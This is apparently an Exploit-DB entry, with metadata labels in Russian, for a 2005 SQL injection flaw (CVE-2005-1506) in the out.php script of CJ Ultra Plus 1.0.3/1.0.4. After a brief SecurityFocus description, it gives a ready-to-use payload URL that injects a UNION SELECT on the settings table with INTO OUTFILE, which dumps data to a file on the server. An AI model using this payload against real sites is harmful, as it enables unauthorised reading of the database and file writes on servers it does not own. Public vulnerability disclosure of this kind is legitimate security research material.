Exploit CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection

[Exploiter]

EDB-ID

25623

Проверка EDB

1. Пройдено

Автор

KOLD

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2005-1506

Дата публикации

2005-05-06

source: https://www.securityfocus.com/bid/13533/info

CJ Ultra Plus is prone to an SQL injection vulnerability.

This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. 

/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*